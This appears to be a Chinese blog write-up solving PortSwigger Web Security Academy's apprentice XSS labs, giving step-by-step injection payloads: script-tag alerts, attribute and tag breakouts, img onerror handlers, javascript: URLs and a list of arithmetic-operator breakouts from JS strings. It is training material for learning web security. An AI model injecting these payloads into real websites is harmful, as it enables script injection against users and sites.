Postswigger 靶场 XSS 通关

文章目录

PostSwigger靶场XSS通关

靶场地址:All labs | Web Security Academy (portswigger.net)

学徒:第一关

html 复制代码
<script>alert(/wuhu/)</script>

学徒:第二关

在页面上没有输入框,进入到博客中查看。

在博客的留言版中输入我们的攻击代码

html 复制代码
<script>alert(/wuhu/)</script>

点击返回博客

成功弹框

学徒:第三关

输入攻击代码查看页面反应

html 复制代码
<script>alert(/wuhu/)</script>

发现我们的攻击代码被传递到了img标签中,这里我们可以尝试将该标签闭合。

构造攻击代码:

html 复制代码
"> <script>alert(/wuhu/)</script>

学徒:第四关

输入参数查看页面反应

wuhu

页面没有任何响应,查看网页源代码

发现我们的攻击代码被传入到了一个span标签中,构造攻击代码

html 复制代码
<script>alert(/wuhu/)</script>

页面还是没有弹窗,怀疑这里将script标签过滤了

重新构造攻击代码

html 复制代码
<img src='#' onerror='alert(/wuhu/)'>
<img src='#' onclick='alert(/wuhu/)'>

学徒:第五关

发现页面中多了一个提交反馈

进入到提交反馈页面

在message中输入构造的攻击代码

html 复制代码
<script>alert(/wuhu/)</script>

发现页面没有任何反应,查看页面提示

这里让我们更改href属性。没什么思路,查看一下页面源代码

观察发现,参数returnPath的值会回显到href属性中,底下的script中的代码也验证了。

构造我们的攻击代码

javascript:alert(/wuhu/)

学徒:第六关

...

学徒:第七关

在输入框输入攻击代码,观察页面反应

html 复制代码
<script>alert(/wuhu/)</script>

页面将我们输入的攻击代码传递到了input标签的value参数中。

这里我们可以将value参数闭合,然后添加一个响应事件。

构造我们的攻击代码:

html 复制代码
" onmouseover = 'alert(/wuhu/)'

学徒:第八关

第八关的提示

提示我们需要提交一个评论,然后在点击评论作者名称的时候调用报警函数。

先提交一个普通的攻击代码查看页面反应。

html 复制代码
<script>alert(/wuhu/)</script>

找到了注入点位置,在a标签的href中,那么我们就可以构造攻击代码了,这里采用伪协议的方式,在Website中来构造攻击代码

html 复制代码
javascript:alert('http://')

然后点击我们的提交评论的名字即可弹框。

学徒:第九关

输入基础攻击代码,查看页面响应

html 复制代码
<script>alert(/wuhu/)</script>

查看页面源代码发现尖括号,反斜杠,单引号,双引号已经被编码了。

那么可以使用中划线/减号,也就是说减号两边的对象也是会先作为js执行,毕竟要先得到两边的值才能进行算数计算。

'-alert(666)-'

因此除了减号,其他数学运算符号和位运算符号也可以,后面绕过XSS的思路就更多了。

html 复制代码
'+alert(1)+'
'/alert(1)/'
'%alert(1)%'
'*alert(1)*'
'^alert(1)^'
'>>alert(1)>>'
'<<alert(1)<<'
'<alert(1)<'
'>alert(1)>'
'==alert(1)=='
相关推荐
hackeroink5 小时前
【2024版】最新推荐好用的XSS漏洞扫描利用工具_xss扫描工具
前端·xss
独行soc7 小时前
#渗透测试#漏洞挖掘#红蓝攻防#护网#sql注入介绍06-基于子查询的SQL注入(Subquery-Based SQL Injection)
数据库·sql·安全·web安全·漏洞挖掘·hw
独行soc9 小时前
#渗透测试#漏洞挖掘#红蓝攻防#护网#sql注入介绍08-基于时间延迟的SQL注入(Time-Based SQL Injection)
数据库·sql·安全·渗透测试·漏洞挖掘
fantasy_arch9 小时前
CPU性能优化-磁盘空间和解析时间
网络·性能优化
Clockwiseee10 小时前
php伪协议
windows·安全·web安全·网络安全
黑客Ash10 小时前
安全算法基础(一)
算法·安全
云云32110 小时前
搭建云手机平台的技术要求?
服务器·线性代数·安全·智能手机·矩阵
云云32110 小时前
云手机有哪些用途?云手机选择推荐
服务器·线性代数·安全·智能手机·矩阵
是Dream呀11 小时前
Python从0到100(七十八):神经网络--从0开始搭建全连接网络和CNN网络
网络·python·神经网络
xcLeigh11 小时前
网络安全 | 防火墙的工作原理及配置指南
安全·web安全